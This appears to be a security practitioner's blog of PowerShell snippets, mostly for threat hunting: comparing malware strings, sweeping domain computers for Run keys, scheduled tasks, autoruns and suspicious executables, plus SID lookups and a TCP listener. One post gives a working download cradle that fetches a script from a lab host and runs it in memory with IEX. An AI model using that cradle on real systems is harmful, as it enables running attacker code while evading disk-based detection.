strings64.exe -n 8 malware2.exe > str2.txt

# load each result as an array of lines
[string []] $lines1 = Get-Content -Path str1.txt
[string []] $lines2 = Get-Content -Path str2.txt

# sort both lists
$lines1 = $lines1 | Sort-Object
$lines2 = $lines2 | Sort-Object

# keep the lines of the first list that also occur in the second (-contains is case-insensitive),
# then collapse adjacent duplicates of the sorted result. Named $sharedStrings rather than
# $matches, which is PowerShell's automatic variable for -match results.
$sharedStrings = @($lines1 | Where-Object { $lines2 -contains $_ })
$sharedStrings | Get-Unique


-----------
find matches in 2 arrays
find matches in 2 lists
find lines in 2 files
find lines in 2 arrays
compare 2 malware strings
compare 2 files
compare 2 arrays


-----------------
Sample output
-----------------
!This program cannot be run in DOS mode.
#+3;CScs
#http://crl.verisign.com/pca3-g5.crl04
#http://logo.verisign.com/vslogo.gif04
%u.%u%s%s
%VeriSign Class 3 Code Signing 2010 CA
%VeriSign Class 3 Code Signing 2010 CA0
%VeriSign Class 3 Code Signing 2010 CA0
*?|<>/":
... %d%%
.DEFAULT\Control Panel\International
.http://crl.thawte.com/ThawteTimestampingCA.crl0
@sS\-Z?G
[Rename]
\Microsoft\Internet Explorer\Quick Launch
~nsu.tmp
+http://ts-aia.ws.symantec.com/tss-ca-g2.cer0<
+http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(



-----------------
from linux try this
------------------
# Strings common to two samples: dump and sort each, then keep lines present in both.
# comm requires both inputs sorted under the same collation, so sort and comm must run
# in the same locale.
for sample in 1 2; do
  strings "${sample}.bin" | sort > "output${sample}.txt"
done
comm -12 output1.txt output2.txt > same.txt

Friday, February 14, 2020

Powershell download cradle

sample download cradle in conjunction with python -m SimpleHTTPServer 80

# Test-lab cradle: fetch a script over HTTP and run it in memory without touching disk.
# "new-object net.webclient ... downloadstring" fed to IEX is the classic download-cradle
# signature; with script block logging enabled (Event 4104) the decoded command is still
# recorded even though no file is written.
powershell -command "$z='http://10.10.10.10/a.ps1'; IEX (new-object net.webclient).downloadstring($z)"

Thursday, February 13, 2020

Powershell split and sort

In powershell if you have an ugly string like the environment path


PS c:\> $env:PATH

C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\WINDOWS\System32\OpenSSH\;C:\Program Files\PuTTY\;C:\Program Files\Microsoft VS Code\bin


you can quickly split it out and make it pretty like this

PS c:\> $env:PATH -Split ";" | Sort-Object -Unique

C:\Program Files (x86)\IBM\Client Access\
C:\Program Files\Microsoft VS Code\bin
C:\Program Files\PuTTY\
C:\WINDOWS
C:\WINDOWS\system32
C:\WINDOWS\System32\OpenSSH\
C:\WINDOWS\System32\Wbem
C:\WINDOWS\System32\WindowsPowerShell\v1.0\

Tuesday, October 15, 2019

Powershell listening on a port

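# Minimal TCP echo listener: accepts ONE client, echoes each received chunk back, exits when
# the client disconnects. 0.0.0.0 binds every interface; use 127.0.0.1 for local-only testing.
$listenAddress = '0.0.0.0'
$listenPort = 1080
$bufferSize = 2048

$socket = new-object System.Net.Sockets.TcpListener($listenAddress, $listenPort);
if($socket -eq $null){
    exit 1;
}
$socket.start();
$client = $socket.AcceptTcpClient();
$stream = $client.GetStream();
$buffer = new-object System.Byte[] $bufferSize;

try
{
    do
    {
        $read = $null;
        # The first Read blocks until the client sends something; keep draining while more is buffered.
        while($stream.DataAvailable -or $read -eq $null) {
            $read = $stream.Read($buffer, 0, $bufferSize);
            if ($read -gt 0) {
                # Decode only the bytes received. The original decoded the whole buffer and then
                # called $buffer.Clear(), which .NET does not support on a fixed-size array.
                $data = [System.Text.Encoding]::ASCII.GetString($buffer, 0, $read).TrimEnd()
                if($data -ne $null -and $data.Length -gt 0){
                    Write-Output ("RECEIVED : [{0}]" -f $data)
                    $sendBack = [System.Text.Encoding]::UTF8.GetBytes($data)
                    # Bug fix: the original passed $results.Length, an undefined variable that
                    # evaluates to 0, so nothing was ever written back.
                    $stream.Write($sendBack, 0, $sendBack.Length)
                    Write-Output ("SENT BACK: [{0}]" -f $data)
                }
            }
        }
    } While ($read -gt 0);
}
finally
{
    # Release in reverse order of creation. The original called Close() on an undefined
    # $fileStream first, which errors before the socket is stopped.
    if($stream){ $stream.Dispose(); }
    if($client){ $client.Close(); }
    if($socket){ $socket.Stop(); }
}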

Monday, January 7, 2019

SID to UserID, UserID to SID


This blog
https://community.spiceworks.com/how_to/2776-powershell-sid-to-user-and-user-to-sid

by SpoonerTech at Spiceworks was very helpful at going back and forth using powershell to and from a User Id or a SID #

Thanks,

Step 1: Domain User to SID

This will give you a Domain User's SID
# Domain account -> SID. Translate() resolves the account through the local security
# authority, so a domain controller must be reachable for domain accounts.
$objUser = [System.Security.Principal.NTAccount]::new("DOMAIN_NAME", "USER_NAME")
$strSID = $objUser.Translate([System.Security.Principal.SecurityIdentifier])
$strSID.Value

Step 2: SID to Domain User

This will allow you to enter a SID and find the Domain User
# SID -> account name (DOMAIN\user form). Fails with IdentityNotMappedException if the SID
# is unknown to the resolving authority.
$objSID = [System.Security.Principal.SecurityIdentifier]::new("ENTER-SID-HERE")
$objUser = $objSID.Translate([System.Security.Principal.NTAccount])
$objUser.Value

Tuesday, January 16, 2018

Powershell script to find startup registries

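# Enumerate the HKLM ...\CurrentVersion\Run key on every AD computer and print one
# "computer,valuename,command" line per entry. Unreachable hosts and failures print
# "computer,," so the output keeps one row per computer. Rows go to the output stream
# (Write-Output) so that "> run.csv" captures them; the original used Write-Host, whose
# text is not redirected by ">".
$pcs = Get-ADComputer -Filter * | Select-Object Name
$strRegType = [Microsoft.Win32.RegistryHive]::LocalMachine
$strKeyGroup = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"
#$strKeyGroup = $strSID + "\Software\Microsoft\Windows\CurrentVersion\RunOnce\"
#$strKeyGroup = $strSID + "\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\"
#$strKeyGroup = $strSID + "\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\"
foreach ($pc in $pcs) {
    $computername = $pc.Name
    if(-not (Test-Connection -ComputerName $computername -Count 1 -Quiet)){
        Write-Output ($computername + ",,")
        continue
    }
    $strRegKey = $null
    Try
    {
        # OpenRemoteBaseKey typically needs the Remote Registry service running on the
        # target and admin rights there.
        $strRegKey = [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey($strRegType, $computername)
        $strRegSubKey = $strRegKey.OpenSubKey($strKeyGroup)
        if($strRegSubKey -eq $null){
            # Key absent: report the computer with empty fields instead of failing on a null object.
            Write-Output ($computername + ",,")
        }else{
            foreach( $name in $strRegSubKey.GetValueNames()) {
                $value = $strRegSubKey.GetValue($name)
                Write-Output ($computername + "," + $name + "," + $value)
            }
            $strRegSubKey.Close()
        }
    }
    Catch
    {
        Write-Output ($computername + ",,")
        Write-Warning ("{0}: {1}" -f $computername, $_.Exception.Message)
    }
    Finally
    {
        # Always release the remote handle; the original closed it only on the success path.
        if($strRegKey -ne $null){ $strRegKey.Close() }
    }
}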

Powershell script to find all scheduled tasks

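# List the files directly under C:\Windows\System32\Tasks on every AD computer (scheduled task
# definitions are stored there as files named after the task) and print "computer,taskname".
# Only the top-level folder is listed, as before; add -Recurse to include nested task folders.
# Rows go to Write-Output so that "> tasks.csv" captures them (Write-Host text is not redirected).
$erroractionPreference="stop"
$pcs = Get-ADComputer -Filter * | Select-Object Name
foreach ($pc in $pcs) {
    $computername = $pc.Name
    if(-not (Test-Connection -ComputerName $computername -Count 1 -Quiet)){
        Write-Output ($computername + ",")
        continue
    }
    Try
    {
        # Read over the C$ administrative share, so the caller needs admin rights on the target.
        $path = "\\" + $computername + "\c$\Windows\System32\Tasks"
        foreach($task in (Get-ChildItem -Path $path -File)){
            Write-Output ($computername + "," + $task.Name)
        }
    }
    Catch
    {
        Write-Output ($computername + ",")
        Write-Warning ("{0}: {1}" -f $computername, $_.Exception.Message)
    }
}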

Powershell script to find all exes in Downloads folder

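# Hash every .exe and .msi in each user's Downloads folder on every AD computer and print
# "computer<TAB>hash<TAB>path". Data rows go to Write-Output (so "> hashes.tsv" captures them);
# progress and error lines stay on Write-Host.
$erroractionPreference="stop"
# MD5 kept for compatibility with existing notes; SHA256 is the better choice for intel lookups.
$hashAlgorithm = "MD5"
$extensions = @("*.exe", "*.msi")
$pcs = Get-ADComputer -Filter * | Select-Object Name
$pccount = $pcs.Count
$counter = 1
foreach ($pc in $pcs) {
    $computername = $pc.Name
    if(Test-Connection -ComputerName $computername -Count 1 -Quiet){
        Try
        {
            $path = "\\" + $computername + "\c$\users"
            # -Directory: the original iterated files in \users as well (e.g. desktop.ini); the
            # resulting bogus Downloads path threw under ErrorActionPreference=Stop and aborted
            # the rest of this computer's profiles.
            foreach($user in (Get-ChildItem -Path $path -Directory)){
                $downloads = Join-Path $path (Join-Path $user.Name "Downloads")
                Write-Host ("{0} of {1} Searching {2}" -f $counter, $pccount, $downloads)
                # Profiles without a Downloads folder are skipped instead of aborting the computer.
                if(-not (Test-Path -Path $downloads)){ continue }
                foreach($ext in $extensions){
                    foreach($file in (Get-ChildItem -Path $downloads -Filter $ext)){
                        $hash = Get-FileHash -Algorithm $hashAlgorithm -Path $file.FullName
                        Write-Output ("{0}`t{1}`t{2}" -f $computername, $hash.Hash, $hash.Path)
                    }
                }
            }
        }
        Catch
        {
            Write-Host ("{0} of {1} Search Error {2}: {3}" -f $counter, $pccount, $computername, $_.Exception.Message)
        }
    }
    else{
        Write-Host ("{0} of {1} Search Connection Failure {2}" -f $counter, $pccount, $computername)
    }
    $counter++
}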

Powershell script to find all folders in program files

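# List the top-level entries of both Program Files folders on every AD computer and print
# "computer,name". Data rows go to Write-Output (so "> programs.csv" captures them); progress
# and error lines stay on Write-Host. One formatted string per row replaces the original
# Write-Host $computername","$program call, whose separately-passed arguments were joined
# with extra spaces.
$erroractionPreference="stop"
$programRoots = @("\c$\program files\", "\c$\program files (x86)\")
$pcs = Get-ADComputer -Filter * | Select-Object Name
$pccount = $pcs.Count
$counter = 1
foreach ($pc in $pcs) {
    $computername = $pc.Name
    if(Test-Connection -ComputerName $computername -Count 1 -Quiet){
        Try
        {
            foreach($root in $programRoots){
                $path = "\\" + $computername + $root
                # A 32-bit host has no "program files (x86)"; skip it rather than failing the computer.
                if(-not (Test-Path -Path $path)){ continue }
                foreach($program in (Get-ChildItem -Path $path)){
                    Write-Output ("{0},{1}" -f $computername, $program.Name)
                }
            }
        }
        Catch
        {
            Write-Host ("{0} of {1} Search Error {2}: {3}" -f $counter, $pccount, $computername, $_.Exception.Message)
        }
    }
    else{
        Write-Host ("{0} of {1} Search Connection Failure {2}" -f $counter, $pccount, $computername)
    }
    $counter++
}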

Powershell script to find autorun keys

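# Query Win32_StartupCommand on every AD computer and print "computer,name,command,location".
# One plain line per entry replaces the calculated-property / Format-Table trick, which also
# printed a table header per computer. Fields are not CSV-quoted; Command values can contain
# commas, so emit objects to Export-Csv instead if strict CSV is needed.
$pcs = Get-ADComputer -Filter * | Select-Object Name
$pccount = $pcs.Count
$counter = 1
foreach ($pc in $pcs) {
    $computername = $pc.Name
    if(Test-Connection -ComputerName $computername -Count 1 -Quiet){
        Try
        {
            # -ErrorAction Stop: Get-WmiObject failures are non-terminating by default and
            # would bypass the Catch below (this script does not set $ErrorActionPreference).
            Get-WmiObject -Class win32_startupcommand -ComputerName $computername -ErrorAction Stop |
                ForEach-Object {
                    "{0},{1},{2},{3}" -f $_.PSComputerName, $_.Name, $_.Command, $_.Location
                }
        }
        Catch
        {
            # The original message also printed $user, which this script never defines.
            Write-Host ("{0} of {1} Search Error {2} {3}" -f $counter, $pccount, $computername, $_)
        }
    }
    else{
        Write-Host ("{0} of {1} Search Connection Failure {2}" -f $counter, $pccount, $computername)
    }
    $counter++
}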

Powershell script to find executables in Public folder

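# Hash files with script/installer/archive extensions sitting directly in C:\Users\Public on every
# AD computer and print "path,hash". Data rows go to Write-Output (so "> public.csv" captures
# them); progress and error lines stay on Write-Host. One formatted line per file replaces the
# calculated-property / Format-Table trick, which also printed a table header per file.
$erroractionPreference="stop"
# MD5 kept for compatibility with existing notes; SHA256 is the better choice for intel lookups.
$hashAlgorithm = "md5"
$suspectExtensions = "\.(exe|jar|msi|zip|js|vbs|ps1|bat|py|rar|hta)$"

$pcs = Get-ADComputer -Filter * | Select-Object Name
$pccount = $pcs.Count
$counter = 1
foreach ($pc in $pcs) {
    $computername = $pc.Name
    if(Test-Connection -ComputerName $computername -Count 1 -Quiet){
        Try
        {
            $path = "\\" + $computername + "\c$\users\public"
            Write-Host ("{0} of {1} Searching {2}" -f $counter, $pccount, $path)
            # Top level only (no -Recurse), as in the original.
            $files = Get-ChildItem -Path $path | Where-Object { $_.Name -match $suspectExtensions }
            foreach($file in $files){
                $hash = Get-FileHash -Algorithm $hashAlgorithm -Path $file.FullName
                Write-Output ("{0},{1}" -f $hash.Path, $hash.Hash)
            }
        }
        Catch
        {
            Write-Host ("{0} of {1} Search Error {2}: {3}" -f $counter, $pccount, $computername, $_.Exception.Message)
        }
    }
    else{
        Write-Host ("{0} of {1} Search Connection Failure {2}" -f $counter, $pccount, $computername)
    }
    $counter++
}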

Thursday, June 22, 2017

Powershell Module to query the SANS ISC API

I listened to a great #SansAtNight talk at #SANSMinneapolis about the @sans_isc by @johullrich and thought I'd try to help out a little with a stormcenter PS module

The SANS ISC API Powershell module is at my github site

You can use it simply by doing commands like

Import-Module stormcenter
Get-ISCInfocon
Get-ISCHandler
Get-ISCIp 192.192.192.192
and many more

It is querying the SANS ISC API






Copyright © 2017, this post cannot be reproduced or retransmitted in any form without reference to the original post.